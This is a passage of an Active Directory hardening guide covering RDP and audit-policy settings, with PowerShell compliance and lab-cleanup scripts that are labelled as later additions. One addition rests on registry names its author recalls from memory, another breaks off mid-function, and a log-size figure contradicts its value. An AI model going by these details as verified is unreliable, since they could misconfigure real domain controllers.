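Keep a break-glass account out of the restricted set, or include the domain controllers themselves in the list, so that a failure of every administration workstation does not lock the team out of the directory.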
The Remote Desktop Session Host Configuration console does not exist in Windows 2012 R2! The server must therefore be configured by GPO. This also allows you to disable printer mapping (which usually generates many errors in the event logs). To do so, move the computer accounts of the administration machines into a separate OU. Start GPMC, then create and link a new GPO called Administrative-computers. Go to Computer Configuration | Policies | Administrative Templates | Windows Components | Remote Desktop Services | Remote Desktop Session Host | Security. Set the GPO settings as follows to configure RDP access over SSL with NLA authentication. You should obtain the configuration below.

You can also configure the RDP service not to map printers in TSE sessions (Computer Configuration | Policies | Administrative Templates | Windows Components | Remote Desktop Services | Remote Desktop Session Host | Printer Redirection).

6.8.3 ALLOW ONLY THE ADMINISTRATION TOOLS

You can greatly increase the security of the directory by hardening the administration workstations. You can indeed enable AppLocker on these workstations to allow only the administration tools required by the administrators.

AppLocker will, for example, prevent the execution of a third-party browser or even Internet Explorer. I invite you to read this document, which explains how to secure Remote Desktop Services servers with AppLocker. In it, the default AppLocker rule authorizing all executables in C:\Windows is deleted. Only the binaries required to start a Remote Desktop session and the administration tools are allowed:

http://msreport.free.fr/articles/Securisation_RDS_2008_R2_V.1.0.1.pdf

AppLocker requires workstations running Windows 7 Enterprise / Ultimate (or later) or Windows Server 2008 R2 (or later).

If your administration stations run Windows 2003 Server, you can use software restriction policies: http://msreport.free.fr/?p=202

6.8.4 CONFIGURING THE REMOTE DESKTOP CLIENT

You must deploy RDP client 7.0 (minimum) on all Windows Vista workstations or later. There is a procedure to enable NLA authentication on Windows XP SP3 (http://support.microsoft.com/kb/951608/en-us) but the use of this system is strongly discouraged (no more security patches since April 2014).

In the Remote Desktop client, go to the Advanced tab, then select Do not connect for the field If server authentication fails. This parameter can be set with the GPO setting Configure server authentication for client under Computer Configuration | Policies | Administrative Templates | Windows Components | Remote Desktop Services.

If the connection attempt comes from a workgroup machine (which does not recognize the certificate as trusted), an error message appears.
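The server settings of 6.8.2 (TLS security layer, NLA required) and the client setting of 6.8.4 (do not connect if server authentication fails) are all visible in the registry, so they can be verified on each administration machine. The script below is an added example written for this edit, not code from the original document or from Msreport. The page only names the GPO settings; the registry value names used here (SecurityLayer, UserAuthentication, MinEncryptionLevel under the RDP-Tcp listener and under the Terminal Services policy key, AuthenticationLevelOverride under the policy key for the client setting) are the ones I know these settings to write, and the defaults assumed when a value is absent are noted in the code.

```powershell
# Added example, not from the original document: read the effective Remote Desktop
# security settings on an administration machine and flag weak values. A value under
# the Terminal Services policy key (set by GPO) takes precedence over the RDP-Tcp listener value.
$RdpListenerKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
$RdpPolicyKey   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'

function Get-RdpSetting {
    # Returns the policy value if set, else the listener value, else $Default.
    param([string]$Name, [int]$Default)
    foreach ($key in @($RdpPolicyKey, $RdpListenerKey)) {
        $item = Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue
        if ($null -ne $item -and $null -ne $item.$Name) { return [int]$item.$Name }
    }
    return $Default
}

function Test-RdpHardening {
    # Server side (6.8.2): SecurityLayer 2 = TLS, UserAuthentication 1 = NLA required,
    # MinEncryptionLevel 3 = High (4 = FIPS). Client side (6.8.4): AuthenticationLevelOverride
    # 2 = "Do not connect" when server authentication fails; it lives in the policy key only.
    $securityLayer = Get-RdpSetting -Name SecurityLayer      -Default 1   # assumed default: Negotiate
    $nla           = Get-RdpSetting -Name UserAuthentication -Default 0   # assumed default: NLA not required
    $encryption    = Get-RdpSetting -Name MinEncryptionLevel -Default 2   # assumed default: Client Compatible
    $clientPolicy  = Get-ItemProperty -Path $RdpPolicyKey -Name AuthenticationLevelOverride -ErrorAction SilentlyContinue
    $clientLevel   = if ($clientPolicy) { [int]$clientPolicy.AuthenticationLevelOverride } else { 1 }   # 1 = warn, client default

    $findings = New-Object System.Collections.Generic.List[string]
    if ($securityLayer -ne 2) { $findings.Add("SecurityLayer=$securityLayer (expected 2, TLS)") }
    if ($nla -ne 1)           { $findings.Add("UserAuthentication=$nla (expected 1, NLA required)") }
    if ($encryption -lt 3)    { $findings.Add("MinEncryptionLevel=$encryption (expected 3 or 4)") }
    if ($clientLevel -ne 2)   { $findings.Add("AuthenticationLevelOverride=$clientLevel (expected 2, do not connect)") }

    [pscustomobject]@{
        ComputerName       = $env:COMPUTERNAME
        SecurityLayer      = $securityLayer
        NlaRequired        = ($nla -eq 1)
        MinEncryptionLevel = $encryption
        ClientAuthLevel    = $clientLevel
        Compliant          = ($findings.Count -eq 0)
        Findings           = $findings.ToArray()
    }
}

# Usage: run locally on each administration machine (for example from a scheduled
# task that dot-sources this file), then collect the Findings column.
# Test-RdpHardening | Format-List
```

A machine that reports SecurityLayer 2 but still presents the self-signed certificate has only done half the work of 6.8.2: the certificate issued by your certification authority must also be bound to the listener, which this check does not cover.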

6.8.5 USING THE "RESTRICTED ADMIN" FEATURE

This is a new Remote Desktop feature that helps fight attacks such as Pass the NTLM Hash. This new feature grants administrator access only on the local machine: if you access another machine from the session, you only have the permissions of the computer account of the server on which you are logged on. This feature was initially available for Windows 8.1 / Windows 2012 R2. It is now available on Windows 7 / Windows 2008 R2 after installing the following patch:
http://support.microsoft.com/kb/2984972

To connect with Remote Desktop in restrictedAdmin mode, run the command:

mstsc /restrictedadmin

Log on as a domain administrator. If you try to connect to a remote server from within the RDP session, you get the message Access is denied. For more information: http://blogs.technet.com/b/kfalde/archive/

6.9 RESTRICT INTERNET ACCESS FROM THE DOMAIN CONTROLLERS

Two solutions are possible for Internet access from domain controllers:

Configure domain controllers to have no Internet access at all:

This solution requires unchecking the boxes Check for publisher's certificate revocation, Check for server certificate revocation and Check for signatures on downloaded programs. Otherwise, you may experience failures or delays when installing some third-party programs or security patches. It will also be necessary to configure the DNS servers on the domain controllers to use other DNS servers (forwarders) to resolve external DNS names. The NTP server used by the root domain controller holding the PDC Emulator role will be an internal server.

Configure domain controllers to have limited Internet access (DNS, HTTP and HTTPS, NTP):

This configuration is simpler to implement. To avoid compromising security, I invite you however to leave UAC active in order to have Internet Explorer in Protected Mode.

Regarding Internet Explorer Enhanced Security Configuration:

This mechanism drastically restricts Internet browsing and requests multiple confirmations when accessing a standard website. The frequency of the pop-ups is very problematic because it pushes administrators to confirm the message without reading it. For this reason, I personally prefer to disable this feature.

6.10 SETTING THE DSRM PASSWORD

The DSRM password is required during Active Directory restore operations. This password is very critical and must meet the following requirements:
• Be known by the Active Directory service management team.
• Be stored in a secure location.
• If possible, be different for each domain controller.
• Contain at least 24 characters.

This password is set when promoting a domain controller. It is possible to use the Ntdsutil tool to change the DSRM password later.

6.11 DEPLOY A STANDARD CONFIGURATION ON ALL DOMAIN CONTROLLERS

6.11.1 CONFIGURING IPV6

By default, since Windows 2008 R1, IPv6 has priority over the IPv4 protocol. When you ping localhost, it is the address ::1 that responds, not 127.0.0.1. Microsoft recommends not disabling IPv6 completely but configuring IPv4 as the preferred protocol. Launch the registry editor and set the registry entry DisabledComponents (REG_DWORD) to 32 (decimal) in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TCPIP6\Parameters.

It is also possible to deploy this registry entry with a GPO preference.

For more information: https://support.microsoft.com/kb/929852/en-us

6.11.2 DEPLOYING AN UP-TO-DATE ANTIVIRUS WITH EXCLUSIONS CONFIGURED

An antivirus for the operating system must be deployed on the domain controllers. It must however be configured to exclude from scanning the files / folders indicated in the Microsoft article http://support.microsoft.com/kb/822158/en-us, such as the Active Directory database files or the SYSVOL directory.

6.11.3 USING THE SECURITY CONFIGURATION WIZARD

Since Windows 2003 Server SP1, Microsoft offers a wizard to strengthen the security of servers. In Windows 2012 R2, this wizard is available in Server Manager, in the Tasks menu.

The wizard uses a configuration template based on the roles deployed on the machine. The tool automatically detects the configuration of the machine (a domain controller / DNS server in our case) and proposes an ideal configuration based on the services present on the machine. Implementing this solution presupposes that the roles deployed on the servers do not change over time. You cannot deploy a new role on your servers if they are configured with this wizard without planning a reconfiguration phase.

The Security Configuration Wizard and its command-line equivalent scwcmd allow you to:
• Create a configuration template (generation of an XML file).
• Analyze whether a machine conforms to a configuration template.
• Apply a configuration template to a machine.
• Remove a configuration template applied to a machine.
• Convert a configuration (XML) into a GPO, using the following command:
scwcmd transform /p:"C:\Windows\security\msscw\Policies\test.xml" /g:"Server Security"

The tool analyzes the roles on the server and proposes to:
• Disable unnecessary services on the server.
• Configure the required exceptions in the Windows Firewall.
• Configure the security settings of the machine.

To configure the security rules, the tool asks questions about the type of clients and offers a secure configuration. In the example below, the parameters in production in the directory are more secure than those proposed by the tool: only the NTLM V2 authentication protocol is allowed in the directory, while the tool proposes to allow NTLM V1 and V2. A critical look at the configuration proposed by the tool is needed.

The following site provides some feedback from experience on hardening Windows clusters. The conclusion is clear: using the Security Configuration Wizard provides a secure and functional configuration.

http://blogs.technet.com/b/mspfe/archive/2014/05/29/why-you-should-avoid-manual-serverhardening.aspx

For more information:

http://technet.microsoft.com/en-us/security/jj720323.aspx
http://www.petri.com/protect-windows-server-using-the-security-configuration-wizard-part-2-applyingand-rolling-back-policies-and-advanced-features.htm
http://technet.microsoft.com/en-us/library/ff807358.aspx

6.11.4 TESTING YOUR IMAGE IN A QUALIFICATION ENVIRONMENT

To test the domain controller deployment image, it is necessary to deploy a model environment that is a copy of the production environment.

6.11.4.1 Requirements (this may vary depending on your environment)

A server with 8 GB of memory and a 128 GB solid-state drive.

A domain controller hosted on a virtual machine. The same virtualization solution as in the production environment (VMware ESX 5.5, Hyper-V...) must be deployed on the qualification server. Note that VMware ESX 5.5 disables disk caching, hence the requirement to use an SSD to maintain proper performance, and that it only recognizes certain network cards (Intel E1000 among others).

If you only have physical domain controllers, I invite you to deploy a temporary domain controller on a virtual machine (one per domain). Avoid P2V, as this may generate a USN rollback, as explained in this article: http://support.microsoft.com/kb/875495/en-us.

6.11.4.2 Step 1: virtualize one domain controller per domain (example with a forest containing 2 domains):

Stop one domain controller in each domain and copy these two domain controllers by copying the files of the corresponding virtual machines (VMs) to the test server. The two domain controllers must be stopped at the same time! Warning, this can have an impact on applications such as Exchange, because this solution relies on specific domain controllers (DS Access). This is even more problematic if DS Access has been forced to specific domain controllers. For more information, I invite you to read this article: http://support.microsoft.com/kb/910999.

When the copy of the two domain controllers (one for the root domain and one for the child domain) is complete, restart the production domain controllers (the original versions). Above all, do not start the copies of the two domain controllers (VMs) at that time.

Configure the replicated virtual machines to start in an isolated network environment.

For people using VMware ESX, create a new vSwitch without assigning any physical network card to it. Map the network cards of the two virtual machines to this vSwitch. With Hyper-V / XenServer, create an internal network and configure the network cards of the two virtual machines on this internal network. It is important that the virtual machines of the test environment cannot communicate with the production environment. If this happens, you will generate very serious replication conflicts. To avoid this problem (in case of a configuration error in the virtualization solution), change the IP addresses of the domain controllers to use an unused range that is not routed to your production network.

The duplicated domain controllers should preferably be DNS servers if you want to retrieve the DNS zones. As a reminder, the DNS zones hosted in ForestDnsZones and DomainDnsZones are replicated only to domain controllers that are DNS servers.

6.11.4.3 Step 2: Cleaning of the directory

The domain controllers that have not been copied must be removed. Transfer the FSMO roles in forced mode (seize them) if necessary. It is as if
you had run DCPROMO /forceremoval on all the domain controllers that have not been copied. For this, we use the Ntdsutil tool and follow the
procedures below:

http://support.microsoft.com/kb/255504/en-us
http://support.microsoft.com/kb/216498/en-us
http://support.microsoft.com/kb/230306
http://support.microsoft.com/kb/887424/fr
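As an added example (not part of the original document), the following PowerShell commands perform this cleaning step on the copied domain controller running inside the isolated network: they seize the FSMO roles and remove the metadata of a domain controller that was not copied, then list what remains. The names DC1 (copied), DC2 (not copied), the site Default-First-Site-Name and the domain msreport.fr are assumed placeholders; the ntdsutil one-liner is the form documented in KB 216498.

```powershell
# Added example, not from the original document. Run it on the copied domain
# controller inside the isolated test network only, never against production.
# Assumed placeholders: DC1 (copied DC), DC2 (DC that was NOT copied),
# site Default-First-Site-Name, domain msreport.fr.
Import-Module ActiveDirectory

$CopiedDc  = 'DC1'
$StaleDcDn = 'CN=DC2,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=msreport,DC=fr'

# 1. Seize the five FSMO roles on the copied DC. -Force turns the transfer into
#    a seize, because the original role holders are unreachable in the isolated
#    network. In a child domain, seize only the three domain roles.
Move-ADDirectoryServerOperationMasterRole -Identity $CopiedDc `
    -OperationMasterRole SchemaMaster, DomainNamingMaster, PDCEmulator, RIDMaster, InfrastructureMaster `
    -Force -Confirm:$false

# 2. Remove the metadata of the DC that was not copied (equivalent of
#    DCPROMO /forceremoval on that DC), as described in KB 216498.
ntdsutil "metadata cleanup" "remove selected server $StaleDcDn" quit quit

# 3. Check: only the copied DCs remain and the copied DC holds every role.
Get-ADDomainController -Filter * | Select-Object Name, Site, OperationMasterRoles
Get-ADForest | Select-Object SchemaMaster, DomainNamingMaster
Get-ADDomain | Select-Object PDCEmulator, RIDMaster, InfrastructureMaster
```

Run the block once per domain of the copied forest (root domain first, since the forest-wide roles live there); repeat step 2 for every domain controller that was not copied.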

6.11.4.4 Step 3: restore the business applications that rely on the directory

To test our image, the critical applications must be restored in the model environment. Applications such as Exchange, which host their
configuration in Active Directory, can be restored in Disaster Recovery mode.

With Exchange 2003: setup.exe /disasterrecovery
With Exchange 2007: setup.com /RecoverServer

You can now test your new Windows image in the qualification environment.

6.11.5 SOME LESSONS LEARNED FROM WINDOWS 2012 R2 DEPLOYMENTS

1. The keyboard configuration is done from Control Panel | Language (choice of language and keyboard) and in Control Panel | Region (setting
the default keyboard at logon by ticking the Welcome screen and system accounts box).

However, if you installed the server in Core mode and then enabled the GUI feature, this setting is not kept. I then invite you to add the
French keyboard again (by temporarily adding another keyboard type). Do not forget to then redefine the correct keyboard for the Welcome
screen.

For more information: http://support.microsoft.com/kb/3002327

2. Some features such as the .NET Framework 3.5.1 refuse to install because the installation sources are missing. This problem occurs on both
Full and Core installations. To correct it, use the sources\SxS directory of the installation DVD.

7 IMPLEMENTING A RISK PREVENTION POLICY
To anticipate attacks and their consequences, it is necessary to be proactive and to put in place the following measures:

• Audit the changes made to the directory and the access attempts.

• Monitor your directory to detect malfunctions that could be linked to attacks.

• Protect the Active Directory backups and the IFM (Install From Media) media. An attacker can indeed recover the passwords of the user
accounts and computer accounts if he obtains the NTDS.DIT and SYSTEM files.

• Prepare a disaster recovery plan in case the directory is compromised.

7.1 AUDIT CHANGES AND TRACE LOGONS ON THE ACTIVE DIRECTORY DIRECTORY WITH WINDOWS AUDITING

Auditing generates entries in the Security log of the domain controllers. It allows, among other things, monitoring the actions performed by
the directory administration teams or tracing authentication requests.

ANSSI has written a white paper detailing the audit settings to deploy in an Active Directory domain. This organization also recommends
enabling the advanced audit policy (split into subcategories) that appeared with Windows 2008 R2.

https://www.ssi.gouv.fr/uploads/IMG/pdf/NP_ActiveDirectory_NoteTech.pdf
https://technet.microsoft.com/en-us/library/dn319056(v=ws.11).aspx

The setting Computer Configuration | Policies | Windows Settings | Security Settings | Local Policies | Security Options | Audit: Force audit
policy subcategory settings (Windows Vista or later) to override audit policy category settings must be enabled in the Default Domain Policy
and the Default Domain Controllers Policy, to force the advanced audit policy and disable the classic audit policies, as described in this
article:

https://www.petri.com/enable-advanced-audit-policy-configuration-windows-server

The Security log of the domain controllers must be configured with a maximum size of 4 GB and automatic log rotation (when the log is full,
the oldest entries are deleted to allow new entries to be written). For this, the following GPO settings must be defined:

Computer Configuration | Policies | Windows Settings | Security Settings | Event Log | Maximum security log size: set to the value 2048000.

Computer Configuration | Policies | Windows Settings | Security Settings | Event Log | Retention method for security log: set to the value
Overwrite events as needed.

The policy Computer Configuration | Policies | Windows Settings | Security Settings | Local Policies | Security Options | Audit: Shut down
system immediately if unable to log security audits must also be disabled.

Enabling all the settings recommended by ANSSI can greatly increase the size of the Security log. After implementing these settings, some
customers had only 30 minutes of logs left with a Security log configured with a maximum size of 2 GB.

Category                        | Audit subcategory                       | Audit setting
--------------------------------|-----------------------------------------|-------------------------
Account Logon                   | Credential Validation                   | Success and Failure
Account Logon                   | Kerberos Authentication Service         | Success and Failure
Account Logon                   | Kerberos Service Ticket Operations      | Success and Failure
Account Logon                   | Other Account Logon Events              | Success and Failure
Account Management              | Application Group Management            | Success and Failure
Account Management              | Computer Account Management             | Success and Failure
Account Management              | Distribution Group Management           | Success and Failure
Account Management              | Other Account Management Events         | Success and Failure
Account Management              | Security Group Management               | Success and Failure
Account Management              | User Account Management                 | Success and Failure
Detailed Tracking               | DPAPI Activity                          | Success and Failure
Detailed Tracking               | Process Creation                        | Success and Failure
Detailed Tracking               | Process Termination                     | No auditing
Detailed Tracking               | RPC Events                              | No auditing
DS Access                       | Detailed Directory Service Replication  | No auditing
DS Access                       | Directory Service Access                | Success and Failure (1)
DS Access                       | Directory Service Changes               | No auditing
DS Access                       | Directory Service Replication           | Success and Failure
Logon / Logoff                  | Account Lockout                         | Success and Failure
Logon / Logoff                  | IPsec Extended Mode                     | No auditing
Logon / Logoff                  | IPsec Main Mode                         | No auditing
Logon / Logoff                  | IPsec Quick Mode                        | No auditing
Logon / Logoff                  | Logoff                                  | Success
Logon / Logoff                  | Logon                                   | Success and Failure
Logon / Logoff                  | Network Policy Server                   | Success and Failure
Logon / Logoff                  | Other Logon / Logoff Events             | Success and Failure
Logon / Logoff                  | Special Logon                           | Success and Failure
Object Access                   | Application Generated                   | Not defined (3)
Object Access                   | Certification Services                  | Not defined (3)
Object Access                   | Detailed File Share                     | Not defined (3)
Object Access                   | File Share                              | Not defined (3)
Object Access                   | File System                             | Not defined (3)
Object Access                   | Filtering Platform Connection           | Not defined (3)
Object Access                   | Filtering Platform Packet Drop          | Not defined (3)
Object Access                   | Handle Manipulation                     | Not defined (3)
Object Access                   | Kernel Object                           | Not defined (3)
Object Access                   | Other Object Access Events              | Success and Failure
Object Access                   | Registry                                | Not defined (3)
Object Access                   | SAM                                     | Not defined (3)
Policy Change                   | Audit Policy Change                     | Success and Failure (2)
Policy Change                   | Authentication Policy Change            | Success and Failure (2)
Policy Change                   | Authorization Policy Change             | Success and Failure (2)
Policy Change                   | Filtering Platform Policy Change        | Success and Failure (2)
Policy Change                   | MPSSVC Rule-Level Policy Change         | Success and Failure (2)
Policy Change                   | Other Policy Change Events              | Failure
Privilege Use                   | Non Sensitive Privilege Use             | No auditing
Privilege Use                   | Other Privilege Use Events              | No auditing
Privilege Use                   | Sensitive Privilege Use                 | No auditing
System                          | IPsec Driver                            | No auditing
System                          | Other System Events                     | Success and Failure
System                          | Security State Change                   | Success
System                          | Security System Extension               | Success
System                          | System Integrity                        | Success and Failure
Global Object Access Auditing   | File system                             | Not defined
Global Object Access Auditing   | Registry                                | Not defined

Legend:
• (1): this generates many messages with ID 4662 (Directory Service Access).
• (2): this generates many messages with ID 5447 (Policy Change Events).
• (3): left Not defined (instead of No auditing) so that auditing of files / registry entries can be enabled on servers on a case-by-case basis.

All the settings in Computer Configuration | Policies | Windows Settings | Security Settings | Local Policies | Audit Policy will be set as
shown below, but they will be ignored unless you still have Windows 2003 domain controllers.

Setting                          | Configuration
---------------------------------|---------------------
Audit system events              | Success and Failure
Audit process tracking           | Success and Failure
Audit privilege use              | Not defined
Audit policy change              | Success and Failure
Audit object access              | Not defined
Audit logon events               | Success and Failure
Audit directory service access   | Success and Failure
Audit account management         | Success and Failure
Audit account logon events       | Success and Failure

The same settings as on the domain controllers will be applied to the workstations and member servers of the domain.
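The following PowerShell script is an added example (it is not part of the original document or of the author's tooling) that checks a domain controller's effective audit configuration against the settings of this section: the subcategory table, the subcategory override policy, the shutdown-on-audit-failure policy and the Security log size and retention. It assumes it is run as an administrator on the domain controller and that auditpol reports subcategory names in English.

```powershell
# Added example, not from the original document: compare a domain controller's
# effective audit settings with the ANSSI-based table above.
# Assumptions: run elevated on the DC; auditpol output is in English.

# Expected advanced audit settings (from the table). Subcategories that the table
# leaves "Not defined" are deliberately absent, so they are not checked.
$Expected = @{
    'Credential Validation'                  = 'Success and Failure'
    'Kerberos Authentication Service'        = 'Success and Failure'
    'Kerberos Service Ticket Operations'     = 'Success and Failure'
    'Other Account Logon Events'             = 'Success and Failure'
    'Application Group Management'           = 'Success and Failure'
    'Computer Account Management'            = 'Success and Failure'
    'Distribution Group Management'          = 'Success and Failure'
    'Other Account Management Events'        = 'Success and Failure'
    'Security Group Management'              = 'Success and Failure'
    'User Account Management'                = 'Success and Failure'
    'DPAPI Activity'                         = 'Success and Failure'
    'Process Creation'                       = 'Success and Failure'
    'Process Termination'                    = 'No Auditing'
    'RPC Events'                             = 'No Auditing'
    'Detailed Directory Service Replication' = 'No Auditing'
    'Directory Service Access'               = 'Success and Failure'
    'Directory Service Changes'              = 'No Auditing'
    'Directory Service Replication'          = 'Success and Failure'
    'Account Lockout'                        = 'Success and Failure'
    'IPsec Extended Mode'                    = 'No Auditing'
    'IPsec Main Mode'                        = 'No Auditing'
    'IPsec Quick Mode'                       = 'No Auditing'
    'Logoff'                                 = 'Success'
    'Logon'                                  = 'Success and Failure'
    'Network Policy Server'                  = 'Success and Failure'
    'Other Logon/Logoff Events'              = 'Success and Failure'
    'Special Logon'                          = 'Success and Failure'
    'Other Object Access Events'             = 'Success and Failure'
    'Audit Policy Change'                    = 'Success and Failure'
    'Authentication Policy Change'           = 'Success and Failure'
    'Authorization Policy Change'            = 'Success and Failure'
    'Filtering Platform Policy Change'       = 'Success and Failure'
    'MPSSVC Rule-Level Policy Change'        = 'Success and Failure'
    'Other Policy Change Events'             = 'Failure'
    'Non Sensitive Privilege Use'            = 'No Auditing'
    'Other Privilege Use Events'             = 'No Auditing'
    'Sensitive Privilege Use'                = 'No Auditing'
    'IPsec Driver'                           = 'No Auditing'
    'Other System Events'                    = 'Success and Failure'
    'Security State Change'                  = 'Success'
    'Security System Extension'              = 'Success'
    'System Integrity'                       = 'Success and Failure'
}

# Effective settings as reported by auditpol in CSV mode (/r)
$Actual = auditpol /get /category:* /r | ConvertFrom-Csv
$Deviations = foreach ($Row in $Actual) {
    $Name = $Row.Subcategory
    if ($Expected.ContainsKey($Name) -and $Row.'Inclusion Setting' -ne $Expected[$Name]) {
        [pscustomobject]@{ Subcategory = $Name; Expected = $Expected[$Name]; Actual = $Row.'Inclusion Setting' }
    }
}

# Security log size and retention (GPO "Maximum security log size" / "Retention method for security log")
$Log = Get-WinEvent -ListLog Security

# "Audit: Force audit policy subcategory settings ... to override audit policy category settings"
# and "Audit: Shut down system immediately if unable to log security audits" are stored under LSA.
$Lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

[pscustomobject]@{
    SubcategoryOverrideEnabled = ($Lsa.SCENoApplyLegacyAuditPolicy -eq 1)   # expected: True
    CrashOnAuditFail           = ($Lsa.CrashOnAuditFail -eq 1)              # expected: False
    SecurityLogMaxMB           = [math]::Round($Log.MaximumSizeInBytes / 1MB)
    SecurityLogMode            = $Log.LogMode                               # expected: Circular (overwrite as needed)
    DeviationCount             = @($Deviations).Count                       # expected: 0
}
$Deviations | Format-Table -AutoSize
```

A non-empty deviation list means the GPO has not applied (or a local policy overrides it); the CrashOnAuditFail value must be 0, otherwise a full Security log will stop the domain controller instead of rotating the log.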


7.2 ANALYZE THE SECURITY LOG

For this, we use a PowerShell script called AuditConnexion. This script requires that the 4 audit settings below are enabled:

Account Logon \ Credential Validation: ID 4776 and 4777
Account Logon \ Kerberos Authentication Service: ID 4768, 4771, 4772
Account Logon \ Kerberos Service Ticket Operations: ID 4769, 4770
Logon / Logoff \ Audit logon: ID 4624, 4625, 4648

The table below lists the event IDs to be collected on the domain controllers.

ID 4624 (protocols: all):
Traces successful logons to the domain. When a user logs on, he connects to the Netlogon and Sysvol shares of the domain controller and
therefore generates a network-type logon on the domain controllers (an indirect method for detecting a logon).

ID 4625 (protocols: all):
Shows logon failures when an administrator logs on to the domain controller directly (MSTSC), or when a service running on a domain
controller does not start because of a login / password problem.

ID 4648 (protocols: all):
Detects a secondary logon, such as starting a service / scheduled task, or the use of a tool like LDP.EXE to make an LDAP Simple Bind
connection to the domain controller (explicit connection with login / password).

ID 4768 (protocol: Kerberos):
Traces who logs on. A Windows machine requests a new TGT when a user logs on. Event 4768 lists the TGT requests, in success and in failure.

ID 4769 (protocol: Kerberos):
Traces the activity of a user by listing the resources to which he connects (Kerberos).

ID 4770 (protocol: Kerberos):
Traces who logs on (TGT renewal).

ID 4771 (protocol: Kerberos):
Traces logon failures (TGT generation failures at the pre-authentication phase).

ID 4772 (protocol: Kerberos):
Traces logon failures (TGT generation failures after the pre-authentication phase). This event is very rare because Kerberos failures
occur at the phase called pre-authentication (bad login / password...). This event will not be collected by the PowerShell script.

ID 4776 (protocols: all except Kerberos):
Traces the activity of a user by listing the resources to which he connects (everything except Kerberos).

The solution is based on a first script that copies the Security log of each domain controller to a processing server.

Then you run the PowerShell script and pass it the domain controller's name and the EVTX file to analyze. Example:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File D:\_adm\AuditConnexion\AuditConnexion.ps1 -DC DC1 -DossierAuditConnexion D:\_adm\AuditConnexion\ -EventName DC1.evtx

PowerShell script:
This script analyzes the Security logs of the domain controllers on a remote machine (other than a domain controller). The script must be run
with 3 parameters (required):

• The name of the solution folder
• The EVTX file name
• The domain controller name.

This approach allows exporting the Security log (EVTX file) several times a day on the domain controllers whose Security log does not hold
24 hours of logs.

Just name the EVTX file NAME-DC-HH-MM, for example. Example:

AuditConnexion.ps1 -DC DC1 -DossierAuditConnexion D:\_adm\AuditConnexion\ -EventName DC1.evtx

The script creates the Work and Results subfolders automatically. The name of the result file shows the date of the last event in the EVTX log.
The Events folder containing the event logs must be created manually. You also have to manually create a subfolder named after the domain
controller.

The following script (agent) must run on the domain controllers to copy the file to the processing server (called serveurrapport here).

del \\serveurrapport\Events$\NAME-DC\DC1.evtx
wevtutil epl Security \\serveurrapport\Events$\NAME-DC\DC1.evtx

You must determine the time required to copy the EVTX file to the analysis server and schedule this task that long before launching the main
script (usually 10 minutes).

The script generates a zip file using a third-party PowerShell function (this avoids the PowerShell V5 prerequisite).

The script is based on the wevtutil command instead of the Get-WinEvent cmdlet, which is far too slow. Examples of commands with the wevtutil tool:

wevtutil qe "C:\_adm\Scripts\AuditConnexionV12\Security-DC1.evtx" /lf:True "/q:*[System[(EventID=4624 or EventID=4625 or EventID=4768 or EventID=4771 or EventID=4776 or EventID=4648)]]" | foreach {}

wevtutil qe "C:\_adm\Scripts\AuditConnexionV12\Security-DC1.evtx" /lf:True "/q:*[System[(EventID=4624 or EventID=4625 or EventID=4768 or EventID=4771 or EventID=4776 or EventID=4648)]]" | Select -First 200000 | foreach {}

wevtutil qe "C:\_adm\Scripts\AuditConnexionV12\Security-DC1.evtx" /lf:True "/q:*[System[(EventID=4648)]]" | Select -First 1

The script has a variable $MaxResultatZipSize that determines whether a link or an attachment is sent, depending on the size of the ZIP file.

The script has a variable $MaxResultatSize that splits the work files when they exceed a certain size. Excel cannot open a file of more than
1 million rows.

Writing to disk is done in blocks of X lines (variable $EcritureNbLigne). This greatly optimizes the execution speed of the script and reduces
the I/O required.

It is recommended to write in blocks of 10,000 lines. Be careful not to saturate the server's memory (PowerShell process) if you use larger
blocks.

The script will saturate one core at 100%. The report generation server must therefore have several cores (minimum 2).

The script has a PowerShell instruction that forces the release of its memory. It is executed when the main work file is written to disk.
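As an added example (not the AuditConnexion script itself), the block below demonstrates the two techniques described in this section: reading the fields of a Security event exported as XML by wevtutil, and writing the resulting CSV lines to disk in blocks with a file split at a maximum size. The three events are constructed samples built in the block, the function and variable names are mine, and the output is written under $env:TEMP; it runs offline without a domain controller.

```powershell
# Added example, not the AuditConnexion script from the document.
# It demonstrates reading wevtutil XML events and buffered CSV writing.
# The events below are constructed samples, not real log entries.

# Build a minimal Security event in the XML shape produced by "wevtutil qe"
function New-SampleEventXml {
    param([int]$EventId, [string]$Keywords, [hashtable]$Data)
    $Fields = ($Data.GetEnumerator() | ForEach-Object { "<Data Name=`"$($_.Key)`">$($_.Value)</Data>" }) -join ''
    return "<Event xmlns=`"http://schemas.microsoft.com/win/2004/08/events/event`"><System><EventID>$EventId</EventID><Keywords>$Keywords</Keywords><TimeCreated SystemTime=`"2017-01-30T08:15:02.123Z`"/><Computer>DC1.msreport.fr</Computer></System><EventData>$Fields</EventData></Event>"
}

$SampleEvents = @(
    (New-SampleEventXml 4624 '0x8020000000000000' @{ TargetUserName = 'jdupont'; TargetDomainName = 'MSREPORT'; LogonType = '3'; LogonProcessName = 'Kerberos'; AuthenticationPackageName = 'Kerberos'; LmPackageName = '-'; IpAddress = '10.0.0.25' }),
    (New-SampleEventXml 4624 '0x8020000000000000' @{ TargetUserName = 'PC042$'; TargetDomainName = 'MSREPORT'; LogonType = '3'; LogonProcessName = 'Kerberos'; AuthenticationPackageName = 'Kerberos'; LmPackageName = '-'; IpAddress = '10.0.0.42' }),
    (New-SampleEventXml 4776 '0x8010000000000000' @{ PackageName = 'MICROSOFT_AUTHENTICATION_PACKAGE_V1_0'; TargetUserName = 'jdupont'; Workstation = 'PC042'; Status = '0xc000006a' })
)

# Parse one event. EventData is read by the Name attribute, not by position
# (the document's script uses Data[n]), so the code does not depend on field order.
function ConvertFrom-SecurityEventXml {
    param([Parameter(Mandatory)][string]$EventXml)
    [xml]$Xml = $EventXml
    $Data = @{}
    foreach ($D in $Xml.Event.EventData.Data) { $Data[$D.GetAttribute('Name')] = $D.'#text' }
    $Status = switch ($Xml.Event.System.Keywords) {
        '0x8020000000000000' { 'Success Audit' }
        '0x8010000000000000' { 'Audit Failure' }
        default { $Xml.Event.System.Keywords }
    }
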